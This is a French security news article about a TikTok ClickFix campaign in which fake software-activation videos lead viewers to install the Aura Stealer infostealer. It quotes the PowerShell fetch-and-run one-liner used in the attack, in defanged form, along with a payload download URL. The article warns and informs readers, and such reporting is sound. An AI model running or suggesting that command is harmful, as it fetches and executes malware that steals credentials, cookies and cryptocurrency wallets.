Les cybercriminels diffusent des logiciels malveillants voleurs d’informations via une campagne sur TikTok, en utilisant des vidéos qui prétendent faussement être des guides d’activation gratuits pour des logiciels populaires. L’opération en cours, identifiée le 19 octobre 2025, utilise une méthode d’ingénierie sociale pour inciter les utilisateurs à infecter leurs propres ordinateurs.
Xavier Mertens, responsable de l’ISC, a rapporté la campagne, notant ses similitudes avec une opération observée par Trend Micro en mai. Les vidéos TikTok prétendent offrir des instructions pour activer des logiciels légitimes tels que Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro et Discord Nitro. La campagne fait également la promotion de services fabriqués, notamment « Netflix Premium » et « Spotify Premium », afin d’attirer un public plus large.
La technique d’attaque est connue sous le nom d’attaque ClickFix, qui consiste à fournir des instructions apparemment utiles qui incitent les utilisateurs à exécuter des commandes malveillantes. Les vidéos affichent une courte commande PowerShell d’une ligne et demandent aux spectateurs de l’exécuter avec les privilèges d’administrateur. Un exemple de commande affiché est iex (irm slmgr[.]win/photoshop). Le nom spécifique du programme dans l’URL, tel que « Photoshop », est modifié pour correspondre au logiciel utilisé dans la vidéo.
Lorsqu’un utilisateur exécute cette commande, PowerShell se connecte au site distant slmgr[.]win. Cette action récupère et exécute un deuxième script PowerShell, qui télécharge ensuite deux fichiers exécutables à partir des pages Cloudflare. Le premier fichier, téléchargé depuis https://file-epq[.]pages[.]dev/updater.exe, est une variante du malware Aura Stealer. Aura Stealer est conçu pour récupérer les informations d’identification enregistrées dans les navigateurs Web, les cookies d’authentification, les portefeuilles de crypto-monnaie et les données de connexion d’autres applications. Ces informations volées sont ensuite téléchargées sur les attaquants, leur donnant accès aux comptes de la victime.
Une deuxième charge utile, nommée source.exe, est également téléchargée. Cet exécutable est utilisé pour auto-compiler le code à l’aide du compilateur Visual C# intégré au framework .NET (csc.exe). Le code compilé est ensuite injecté et lancé directement en mémoire. L’objectif précis de cette deuxième charge utile n’a pas encore été déterminé.
Les utilisateurs qui ont suivi les instructions de ces vidéos doivent considérer que toutes leurs informations d’identification sont compromises et il est conseillé de réinitialiser immédiatement les mots de passe de tous les sites Web et services en ligne qu’ils utilisent.
Les attaques ClickFix sont devenues beaucoup plus courantes au cours de l’année écoulée. Ils sont utilisés pour distribuer diverses souches de logiciels malveillants dans le cadre de campagnes liées au vol de ransomwares et de cryptomonnaies. En tant que pratique générale de sécurité, les utilisateurs ne doivent jamais copier le texte d’un site Web et l’exécuter dans une boîte de dialogue du système d’exploitation, y compris la barre d’adresse de l’Explorateur de fichiers, l’invite de commande, PowerShell, le terminal macOS ou les shells Linux.
